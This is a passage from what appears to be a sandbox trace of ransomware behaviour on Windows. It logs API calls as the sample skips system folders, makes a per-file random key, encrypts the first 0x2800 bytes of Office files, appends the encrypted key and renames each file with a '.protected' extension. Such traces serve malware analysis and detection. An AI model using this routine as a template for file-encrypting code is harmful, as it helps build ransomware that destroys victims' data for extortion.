lstrcmpiW (lpString1="PUBWZINT.REST.trx_dll", lpString2="Program Files") returned 1 [0068.079] lstrcmpiW (lpString1="PUBWZINT.REST.trx_dll", lpString2="Program Files (x86)") returned 1 [0068.079] lstrcmpiW (lpString1="PUBWZINT.REST.trx_dll", lpString2="$Recycle.bin") returned 1 [0068.079] lstrcmpiW (lpString1="PUBWZINT.REST.trx_dll", lpString2="System Volume Information") returned -1 [0068.079] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\PUBWZINT.REST.trx_dll") returned 73 [0068.079] StrStrIW (lpFirst="PUBWZINT.REST.trx_dll", lpSrch=".protected") returned 0x0 [0068.079] lstrcmpW (lpString1="PUBWZINT.REST.trx_dll", lpString2="RESTORE_FILES.txt") returned -1 [0068.079] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ec4c | out: pbBuffer=0x295ec4c) returned 1 [0068.080] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4a9210*, pdwDataLen=0x295ec74*=0x20, dwBufLen=0x30 | out: pbData=0x4a9210*, pdwDataLen=0x295ec74*=0x30) returned 1 [0068.080] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\PUBWZINT.REST.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\1036\\pubwzint.rest.trx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0068.083] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\PUBWZINT.REST.trx_dll") returned 73 [0068.083] StrStrW (lpFirst="PUBWZINT.REST.trx_dll", lpSrch=".txt") returned 0x0 [0068.083] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\PUBWZINT.REST.trx_dll") returned 73 [0068.083] StrStrW (lpFirst="PUBWZINT.REST.trx_dll", lpSrch=".rar") returned 0x0 [0068.083] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\PUBWZINT.REST.trx_dll") returned 73 
[0068.083] StrStrW (lpFirst="PUBWZINT.REST.trx_dll", lpSrch=".zip") returned 0x0 [0068.083] ReadFile (in: hFile=0xd8, lpBuffer=0x49dc50, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x49dc50*, lpNumberOfBytesRead=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0068.088] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0068.088] WriteFile (in: hFile=0xd8, lpBuffer=0x49dc50*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x49dc50*, lpNumberOfBytesWritten=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0068.089] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0068.089] WriteFile (in: hFile=0xd8, lpBuffer=0x295ec6c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x295ec6c*, lpNumberOfBytesWritten=0x295ec94*=0x4, lpOverlapped=0x0) returned 1 [0068.267] WriteFile (in: hFile=0xd8, lpBuffer=0x4a9210*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x4a9210*, lpNumberOfBytesWritten=0x295ec94*=0x30, lpOverlapped=0x0) returned 1 [0068.268] CloseHandle (hObject=0xd8) returned 1 [0068.268] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\PUBWZINT.REST.trx_dll.protected") returned 83 [0068.268] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\PUBWZINT.REST.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\1036\\pubwzint.rest.trx_dll"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\PUBWZINT.REST.trx_dll.protected" (normalized: 
"c:\\programdata\\microsoft\\office\\uicaptions\\1036\\pubwzint.rest.trx_dll.protected")) returned 1 [0068.269] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0068.269] lstrcmpiW (lpString1="SGRES.DLL.trx_dll", lpString2="Windows") returned -1 [0068.269] lstrcmpiW (lpString1="SGRES.DLL.trx_dll", lpString2="Program Files") returned 1 [0068.269] lstrcmpiW (lpString1="SGRES.DLL.trx_dll", lpString2="Program Files (x86)") returned 1 [0068.269] lstrcmpiW (lpString1="SGRES.DLL.trx_dll", lpString2="$Recycle.bin") returned 1 [0068.269] lstrcmpiW (lpString1="SGRES.DLL.trx_dll", lpString2="System Volume Information") returned -1 [0068.269] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\SGRES.DLL.trx_dll") returned 69 [0068.269] StrStrIW (lpFirst="SGRES.DLL.trx_dll", lpSrch=".protected") returned 0x0 [0068.269] lstrcmpW (lpString1="SGRES.DLL.trx_dll", lpString2="RESTORE_FILES.txt") returned 1 [0068.269] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ec4c | out: pbBuffer=0x295ec4c) returned 1 [0068.269] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4a9210*, pdwDataLen=0x295ec74*=0x20, dwBufLen=0x30 | out: pbData=0x4a9210*, pdwDataLen=0x295ec74*=0x30) returned 1 [0068.269] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\SGRES.DLL.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\1036\\sgres.dll.trx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0068.348] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\SGRES.DLL.trx_dll") returned 69 [0068.348] StrStrW (lpFirst="SGRES.DLL.trx_dll", lpSrch=".txt") returned 0x0 [0068.348] lstrlenW 
(lpString="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\SGRES.DLL.trx_dll") returned 69 [0068.348] StrStrW (lpFirst="SGRES.DLL.trx_dll", lpSrch=".rar") returned 0x0 [0068.348] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\SGRES.DLL.trx_dll") returned 69 [0068.348] StrStrW (lpFirst="SGRES.DLL.trx_dll", lpSrch=".zip") returned 0x0 [0068.348] ReadFile (in: hFile=0xd8, lpBuffer=0x49dc50, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x49dc50*, lpNumberOfBytesRead=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0068.367] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0068.367] WriteFile (in: hFile=0xd8, lpBuffer=0x49dc50*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x49dc50*, lpNumberOfBytesWritten=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0068.368] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0068.368] WriteFile (in: hFile=0xd8, lpBuffer=0x295ec6c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x295ec6c*, lpNumberOfBytesWritten=0x295ec94*=0x4, lpOverlapped=0x0) returned 1 [0068.375] WriteFile (in: hFile=0xd8, lpBuffer=0x4a9210*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x4a9210*, lpNumberOfBytesWritten=0x295ec94*=0x30, lpOverlapped=0x0) returned 1 [0068.375] CloseHandle (hObject=0xd8) returned 1 [0068.376] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\SGRES.DLL.trx_dll.protected") returned 79 [0068.376] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\SGRES.DLL.trx_dll" 
(normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\1036\\sgres.dll.trx_dll"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\SGRES.DLL.trx_dll.protected" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\1036\\sgres.dll.trx_dll.protected")) returned 1 [0068.376] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0068.376] lstrcmpiW (lpString1="STINTL.DLL.trx_dll", lpString2="Windows") returned -1 [0068.376] lstrcmpiW (lpString1="STINTL.DLL.trx_dll", lpString2="Program Files") returned 1 [0068.376] lstrcmpiW (lpString1="STINTL.DLL.trx_dll", lpString2="Program Files (x86)") returned 1 [0068.376] lstrcmpiW (lpString1="STINTL.DLL.trx_dll", lpString2="$Recycle.bin") returned 1 [0068.376] lstrcmpiW (lpString1="STINTL.DLL.trx_dll", lpString2="System Volume Information") returned -1 [0068.376] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\STINTL.DLL.trx_dll") returned 70 [0068.376] StrStrIW (lpFirst="STINTL.DLL.trx_dll", lpSrch=".protected") returned 0x0 [0068.376] lstrcmpW (lpString1="STINTL.DLL.trx_dll", lpString2="RESTORE_FILES.txt") returned 1 [0068.376] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ec4c | out: pbBuffer=0x295ec4c) returned 1 [0068.377] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4a9210*, pdwDataLen=0x295ec74*=0x20, dwBufLen=0x30 | out: pbData=0x4a9210*, pdwDataLen=0x295ec74*=0x30) returned 1 [0068.377] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\STINTL.DLL.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\1036\\stintl.dll.trx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0068.378] lstrlenW 
(lpString="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\STINTL.DLL.trx_dll") returned 70 [0068.378] StrStrW (lpFirst="STINTL.DLL.trx_dll", lpSrch=".txt") returned 0x0 [0068.378] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\STINTL.DLL.trx_dll") returned 70 [0068.378] StrStrW (lpFirst="STINTL.DLL.trx_dll", lpSrch=".rar") returned 0x0 [0068.378] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\STINTL.DLL.trx_dll") returned 70 [0068.378] StrStrW (lpFirst="STINTL.DLL.trx_dll", lpSrch=".zip") returned 0x0 [0068.378] ReadFile (in: hFile=0xd8, lpBuffer=0x49dc50, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x49dc50*, lpNumberOfBytesRead=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0068.383] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0068.383] WriteFile (in: hFile=0xd8, lpBuffer=0x49dc50*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x49dc50*, lpNumberOfBytesWritten=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0068.383] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0068.383] WriteFile (in: hFile=0xd8, lpBuffer=0x295ec6c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x295ec6c*, lpNumberOfBytesWritten=0x295ec94*=0x4, lpOverlapped=0x0) returned 1 [0068.383] WriteFile (in: hFile=0xd8, lpBuffer=0x4a9210*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x4a9210*, lpNumberOfBytesWritten=0x295ec94*=0x30, lpOverlapped=0x0) returned 1 [0068.383] CloseHandle (hObject=0xd8) returned 1 [0068.384] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s%s" | out: 
pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\STINTL.DLL.trx_dll.protected") returned 80 [0068.384] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\STINTL.DLL.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\1036\\stintl.dll.trx_dll"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\STINTL.DLL.trx_dll.protected" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\1036\\stintl.dll.trx_dll.protected")) returned 1 [0068.385] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0068.385] lstrcmpiW (lpString1="VISBRRES.DLL.trx_dll", lpString2="Windows") returned -1 [0068.385] lstrcmpiW (lpString1="VISBRRES.DLL.trx_dll", lpString2="Program Files") returned 1 [0068.385] lstrcmpiW (lpString1="VISBRRES.DLL.trx_dll", lpString2="Program Files (x86)") returned 1 [0068.385] lstrcmpiW (lpString1="VISBRRES.DLL.trx_dll", lpString2="$Recycle.bin") returned 1 [0068.385] lstrcmpiW (lpString1="VISBRRES.DLL.trx_dll", lpString2="System Volume Information") returned 1 [0068.385] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\VISBRRES.DLL.trx_dll") returned 72 [0068.385] StrStrIW (lpFirst="VISBRRES.DLL.trx_dll", lpSrch=".protected") returned 0x0 [0068.385] lstrcmpW (lpString1="VISBRRES.DLL.trx_dll", lpString2="RESTORE_FILES.txt") returned 1 [0068.385] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ec4c | out: pbBuffer=0x295ec4c) returned 1 [0068.385] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4a9210*, pdwDataLen=0x295ec74*=0x20, dwBufLen=0x30 | out: pbData=0x4a9210*, pdwDataLen=0x295ec74*=0x30) returned 1 [0068.385] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\VISBRRES.DLL.trx_dll" (normalized: 
"c:\\programdata\\microsoft\\office\\uicaptions\\1036\\visbrres.dll.trx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0068.386] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\VISBRRES.DLL.trx_dll") returned 72 [0068.386] StrStrW (lpFirst="VISBRRES.DLL.trx_dll", lpSrch=".txt") returned 0x0 [0068.386] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\VISBRRES.DLL.trx_dll") returned 72 [0068.386] StrStrW (lpFirst="VISBRRES.DLL.trx_dll", lpSrch=".rar") returned 0x0 [0068.386] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\VISBRRES.DLL.trx_dll") returned 72 [0068.386] StrStrW (lpFirst="VISBRRES.DLL.trx_dll", lpSrch=".zip") returned 0x0 [0068.386] ReadFile (in: hFile=0xd8, lpBuffer=0x49dc50, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x49dc50*, lpNumberOfBytesRead=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0068.413] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0068.413] WriteFile (in: hFile=0xd8, lpBuffer=0x49dc50*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x49dc50*, lpNumberOfBytesWritten=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0068.414] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0068.414] WriteFile (in: hFile=0xd8, lpBuffer=0x295ec6c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x295ec6c*, lpNumberOfBytesWritten=0x295ec94*=0x4, lpOverlapped=0x0) returned 1 [0068.420] WriteFile (in: hFile=0xd8, lpBuffer=0x4a9210*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ec94, 
lpOverlapped=0x0 | out: lpBuffer=0x4a9210*, lpNumberOfBytesWritten=0x295ec94*=0x30, lpOverlapped=0x0) returned 1 [0068.420] CloseHandle (hObject=0xd8) returned 1 [0068.420] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\VISBRRES.DLL.trx_dll.protected") returned 82 [0068.420] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\VISBRRES.DLL.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\1036\\visbrres.dll.trx_dll"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\VISBRRES.DLL.trx_dll.protected" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\1036\\visbrres.dll.trx_dll.protected")) returned 1 [0068.422] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0068.422] lstrcmpiW (lpString1="VISINTL.DLL.trx_dll", lpString2="Windows") returned -1 [0068.422] lstrcmpiW (lpString1="VISINTL.DLL.trx_dll", lpString2="Program Files") returned 1 [0068.422] lstrcmpiW (lpString1="VISINTL.DLL.trx_dll", lpString2="Program Files (x86)") returned 1 [0068.422] lstrcmpiW (lpString1="VISINTL.DLL.trx_dll", lpString2="$Recycle.bin") returned 1 [0068.422] lstrcmpiW (lpString1="VISINTL.DLL.trx_dll", lpString2="System Volume Information") returned 1 [0068.422] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\VISINTL.DLL.trx_dll") returned 71 [0068.422] StrStrIW (lpFirst="VISINTL.DLL.trx_dll", lpSrch=".protected") returned 0x0 [0068.422] lstrcmpW (lpString1="VISINTL.DLL.trx_dll", lpString2="RESTORE_FILES.txt") returned 1 [0068.422] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ec4c | out: pbBuffer=0x295ec4c) returned 1 [0068.422] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4a9210*, pdwDataLen=0x295ec74*=0x20, 
dwBufLen=0x30 | out: pbData=0x4a9210*, pdwDataLen=0x295ec74*=0x30) returned 1 [0068.422] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\VISINTL.DLL.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\1036\\visintl.dll.trx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0068.422] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\VISINTL.DLL.trx_dll") returned 71 [0068.422] StrStrW (lpFirst="VISINTL.DLL.trx_dll", lpSrch=".txt") returned 0x0 [0068.422] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\VISINTL.DLL.trx_dll") returned 71 [0068.422] StrStrW (lpFirst="VISINTL.DLL.trx_dll", lpSrch=".rar") returned 0x0 [0068.422] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\VISINTL.DLL.trx_dll") returned 71 [0068.422] StrStrW (lpFirst="VISINTL.DLL.trx_dll", lpSrch=".zip") returned 0x0 [0068.423] ReadFile (in: hFile=0xd8, lpBuffer=0x49dc50, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x49dc50*, lpNumberOfBytesRead=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0068.463] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0068.463] WriteFile (in: hFile=0xd8, lpBuffer=0x49dc50*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x49dc50*, lpNumberOfBytesWritten=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0068.557] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0068.557] WriteFile (in: hFile=0xd8, lpBuffer=0x295ec6c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: 
lpBuffer=0x295ec6c*, lpNumberOfBytesWritten=0x295ec94*=0x4, lpOverlapped=0x0) returned 1 [0068.558] WriteFile (in: hFile=0xd8, lpBuffer=0x4a9210*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x4a9210*, lpNumberOfBytesWritten=0x295ec94*=0x30, lpOverlapped=0x0) returned 1 [0068.558] CloseHandle (hObject=0xd8) returned 1 [0068.559] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\VISINTL.DLL.trx_dll.protected") returned 81 [0068.559] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\VISINTL.DLL.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\1036\\visintl.dll.trx_dll"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\VISINTL.DLL.trx_dll.protected" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\1036\\visintl.dll.trx_dll.protected")) returned 1 [0068.687] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0068.687] lstrcmpiW (lpString1="WWINTL.DLL.trx_dll", lpString2="Windows") returned 1 [0068.687] lstrcmpiW (lpString1="WWINTL.DLL.trx_dll", lpString2="Program Files") returned 1 [0068.687] lstrcmpiW (lpString1="WWINTL.DLL.trx_dll", lpString2="Program Files (x86)") returned 1 [0068.687] lstrcmpiW (lpString1="WWINTL.DLL.trx_dll", lpString2="$Recycle.bin") returned 1 [0068.687] lstrcmpiW (lpString1="WWINTL.DLL.trx_dll", lpString2="System Volume Information") returned 1 [0068.688] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\WWINTL.DLL.trx_dll") returned 70 [0068.688] StrStrIW (lpFirst="WWINTL.DLL.trx_dll", lpSrch=".protected") returned 0x0 [0068.688] lstrcmpW (lpString1="WWINTL.DLL.trx_dll", lpString2="RESTORE_FILES.txt") returned 1 [0068.688] CryptGenRandom (in: 
hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ec4c | out: pbBuffer=0x295ec4c) returned 1 [0068.688] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4a9210*, pdwDataLen=0x295ec74*=0x20, dwBufLen=0x30 | out: pbData=0x4a9210*, pdwDataLen=0x295ec74*=0x30) returned 1 [0068.688] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\WWINTL.DLL.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\1036\\wwintl.dll.trx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0068.688] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\WWINTL.DLL.trx_dll") returned 70 [0068.688] StrStrW (lpFirst="WWINTL.DLL.trx_dll", lpSrch=".txt") returned 0x0 [0068.693] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\WWINTL.DLL.trx_dll") returned 70 [0068.693] StrStrW (lpFirst="WWINTL.DLL.trx_dll", lpSrch=".rar") returned 0x0 [0068.693] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\WWINTL.DLL.trx_dll") returned 70 [0068.694] StrStrW (lpFirst="WWINTL.DLL.trx_dll", lpSrch=".zip") returned 0x0 [0068.694] ReadFile (in: hFile=0xd8, lpBuffer=0x49dc50, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x49dc50*, lpNumberOfBytesRead=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0068.708] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0068.708] WriteFile (in: hFile=0xd8, lpBuffer=0x49dc50*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x49dc50*, lpNumberOfBytesWritten=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0068.708] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | 
